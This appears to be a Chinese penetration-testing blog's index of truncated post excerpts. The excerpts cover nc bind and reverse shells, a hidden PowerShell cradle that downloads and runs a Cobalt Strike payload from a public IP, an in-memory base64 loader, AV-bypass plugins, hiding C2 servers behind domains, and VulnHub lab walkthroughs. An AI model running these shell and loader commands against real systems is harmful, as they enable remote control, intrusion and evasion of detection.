反弹Shell简介正向shell 正向shell：控制端主动发起连接请求去连接被控制端，中间网络链路不存在阻碍。 反向shell 反向shell（反弹shell）：被控端主动发起连接请求去连接控制端。 通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。 NCNC正向Shell 被控端：nc -lvvp 6666 -e cmd.exe控制端：nc 192.168.247.131 6666原理：被控端将cmd.exe重定向到本地的6666端口，控制端主动连接被控端的6666端口，即可获得shell 被控端： 控制端： NC反向Shell 控制端：nc -lvvp 7777被控端：nc -e cmd.exe 192.168.1.105 7777原理：被控端将cmd.exe重定向到控制端的7777端口，控制端只需要监听本地的7777端口，即可获得shell。 控制端： 被控端： Mshta Mshta.exe 是用于负责解释运行 HTA (HTML应用程序)文件的Windows OS实用程序。 可以运行JavaScript或VB ...

CS的Powershell加载器在cobaltstrike中，我们经常会使用powershell远程加载上线，下面来大概分析下其基本原理。 CS生成Powershell反弹shell 1powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://47.236.16.67:802/a'))" 获取远程加载代码 访问url链接即可获得如下代码 1$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("...base64加密字符串..."));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); 代码解释 先 base64 解码一段字符 ...

CobaltStrike扩展脚本扩展脚本简介扩展是 Cobaltstrike 一个极为重要的模块，它有效地丰富了 Cobaltstrike 的功能 选择菜单栏的 CobaltStrike > Script Manager(脚本管理器)，点击 Load(加载)，然后选择要使用的.cna扩展文件即可 常用扩展脚本插件后渗透插件-梼杌：https://gitee.com/yijingsec/taowu-cobalt-strike-en 免杀插件-bypassAV：https://gitee.com/yijingsec/BypassAV 上线linux主机-CrossC2：https://gitee.com/yijingsec/CrossC2 CS上线Linux主机CrossC2介绍项目地址：https://gitee.com/yijingsec/CrossC2项目文档：https://gitee.com/yijingsec/CrossC2/blob/cs4.1/README_zh_full.md Cross C2 项目是一个可以生成 Linux/Mac OS 的 Cobalt ...

Powershell基础Powershell简介 什么是 Windows PowerShell Windows PowerShell 是 Microsoft 创建的基于任务的自动化命令行Shell和相关脚本语言，基于 .NET 框架。 是Microsoft的新Shell，它将旧的命令提示符(CMD)功能与具有内置系统管理功能的新脚本指令集结合在一起。 用于控制和自动化管理Windows操作系统和运行在操作系统上的应用。 被广泛用于渗透测试等方面，在不需要写入磁盘的情况下执行命令，也可以逃避 Anti-Virus 检测。 Windows PowerShell 中的命令称为 cmdlet ，发音为“ command-lets ”，其中每个 cmdlet 代表特定的功能或基于任务的脚本。 Powershell 默认安装在Win7及以后的系统上。 操作系统信任，提供Windows操作系统的几乎一切访问权限 Windows PowerShell 集成脚本环境(ISE) 为什么使用 Windows PowerShell 它既是脚本语言，又是命令行Shell。它可以与不同 ...

域名上线隐藏IP为什么要隐藏IP在使用MSF或者CS获得目标机Sessions或者Beacon时，如果直接使用自己的VPS作为MSF或CS的服务器时，容易被溯源到攻击者所在VPS主机IP。 域名上线原理当我们访问域名时会经过域名解析，域名解析就是将域名转换到IP地址的过程，我们通过域名访问服务器，实际上是访问的目标服务器IP地址 A记录： 将域名指向一个IPv4地址（例如：100.100.100.100），需要增加A记录 CNAME记录： 如果将域名指向一个域名，实现与被指向域名相同的访问效果，需要增加CNAME记录。这个域名一般是主机服务商提供的一个域名 MX记录： 建立电子邮箱服务，将指向邮件服务器地址，需要设置MX记录。建立邮箱时，一般会根据邮箱服务商提供的MX记录填写此记录 NS记录： 域名解析服务器记录，如果要将子域名指定某个域名服务器来解析，需要设置NS记录TXT记录： 可任意填写，可为空。一般做一些验证记录时会使用此项，如：做SPF（反垃圾邮件）记录 AAAA记录： 将主机名（或域名）指向一个IPv6地址（例如：ff03:0:0:0:0:0:0:c1），需要添加AAAA ...

0x00 准备工作在vulnhub官网下载DC:2靶机https://www.vulnhub.com/entry/dc-2,311/ 导入到vmware 注意：保障靶机和渗透主机在同一网段即可，这里我们网络模式选择 NAT 模式，即共享IP地址 打开kali准备进行渗透（ip：192.168.247.135） 根据提示 需要把靶机的IP和 域名绑定 修改hosts文件 0x01 信息收集跟上题一样（arp-scan,masscan,nmap） 123451、arp-scan -l2、masscan --rate=10000 -p1-65535 192.168.247.1373、nmap -sV -p 80,7744 -A -oX dc2.xml 192.168.247.137 1nmap -sS 192.168.247.135/24 得知 渗透机kali IP ：192.168.247.135靶机IP ：192.168.247.137 对靶机进行深度扫描 或者 发现 ip，直接 nmap 一顿梭：nmap -A -p- -T4 192.168.247.137 接着他的 ...

https://www.vulnhub.com/entry/dc-1,292/ 导入到vmware 信息收集法一：kali里使用netdiscover发现主机 法二：查看本机ip nmap扫描靶机ip 1nmap -sS 192.168.247.135/24 通过nmap寻找到靶机的地址为192.168.247.136 开启了22端口，ssh服务80，http服务111，RPC服务(Remote Procedure Call，远程过程调用)服务所开放的端口，主要用于分布式系统中不同计算机的内部进程通信，RPC在多种网络服务中都是很重要的组件。常见的RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等等。 得知 **渗透机：kali IP ：192.168.247.135 **靶机IP ：192.168.247.136 对靶机更深入扫描 1nmap -A -sV --min-parallelism 200 192.168.247.136 –min-parallelism 代表调整探测报文的并行度，也就是在扫描同一台 ...

CobaltStrike渗透框架CobaltStrike框架介绍CobaltStrike简介Cobalt Strike（简称为CS）是一款团队作战渗透测试神器，是一种可以用来进行横向移动、数据窃取、鱼叉式钓鱼的后渗透工具，分为客户端和服务端，一个客户端可以连接多个服务端，一个服务端也可以对应多个客户端连接。 CobaltStrike 目录结构 cobaltstrike.store ： 此证书用来加密 Cobalt Strike 和客户端通信，带有默认 hash 而且比较敏感，建议自己生成一个 1keytool -list -v -keystore cobaltstrike.store TeamServer.prop ：包含很多参数用于自定义用于验证屏幕截图和 keylog 回调数据的设置 CobaltStrike基本使用CS安装运行环境配置 1、Linux 安装 JDK 12apt search java | grep jdkapt install openjdk-11-jdk 2、Windows 安装 JDK 下载JDK： https://www.oracle.com/java/ ...

管道方法一： 方法二： 用stegslove 左上角出现白色条纹 第一行即出现flag